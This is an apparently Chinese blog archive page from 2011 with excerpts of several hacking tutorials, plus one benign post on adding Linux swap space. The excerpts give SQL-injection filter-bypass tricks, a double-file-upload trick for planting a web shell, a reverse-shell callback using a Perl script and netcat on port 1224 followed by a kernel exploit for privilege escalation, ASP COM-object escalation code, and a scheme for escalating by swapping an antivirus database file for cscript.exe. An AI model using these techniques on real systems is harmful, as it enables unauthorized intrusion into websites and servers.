2011年11月13日

怎样绕过防注入系统

摘要: 1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or' swords' =‘swords',由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不影响运行。3、运用字符串判断代替 用经典的or 1=1判断绕过,如or 'swords' ='swords&# 阅读全文

posted @ 2011-11-13 19:33 0xcc 阅读(319) 评论(0) 推荐(0) 编辑

Linux增加swap分区

摘要: 在安装Oracle时要求很大的swap空间,发现swap空间不够,那应该怎么增加swap空间大小呢。在扩容钱,可以使用#grep SwapTotal /proc/meminfo命令查看swap空间大小,使用#du -h /tmp查看/tmp空间大小。以下的操作都要在root用户下进行,首先先建立一个分区,采用dd命令比如dd if=/dev/zero of=/home/swap bs=1024 count=512000 这样就会创建/home/swap这么一个分区文件。文件的大小是512000个block,一般情况下1个block为1K,所以这里空间是512M。接着再把这个分区变成swap分区 阅读全文

posted @ 2011-11-13 19:29 0xcc 阅读(223) 评论(0) 推荐(0) 编辑

突破限制——双文件上传

摘要: 2011-10-14 22:48 上传下载附件 (74.05 KB)下面是一个上传地址:右键—查看源代码,修改2处代码:修改后:保存为1.html第一个上传选择正常的jpg图片,第2个选择我们的马, 这里asp过滤了,所以我选择cdx成功突破, 右键—查看源代码最后菜刀连接上 ok 阅读全文

posted @ 2011-11-13 13:21 0xcc 阅读(300) 评论(0) 推荐(0) 编辑

linux溢出提权

摘要: 先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid=529(zeicom)还不是root权限,输入uname –r 返回:2.6.18-164.11.1.el5PAE找对应的exp, 这里地址整理很齐全可以这里下 http://bbs.tian6.com/linux 阅读全文

posted @ 2011-11-13 02:40 0xcc 阅读(830) 评论(0) 推荐(0) 编辑

无wscript.shell组件提权

摘要: 代码:<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if 阅读全文

posted @ 2011-11-13 02:39 0xcc 阅读(382) 评论(0) 推荐(0) 编辑

星外提权

摘要: 星外提权方法打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 阅读全文

posted @ 2011-11-13 02:25 0xcc 阅读(2131) 评论(0) 推荐(0) 编辑

导航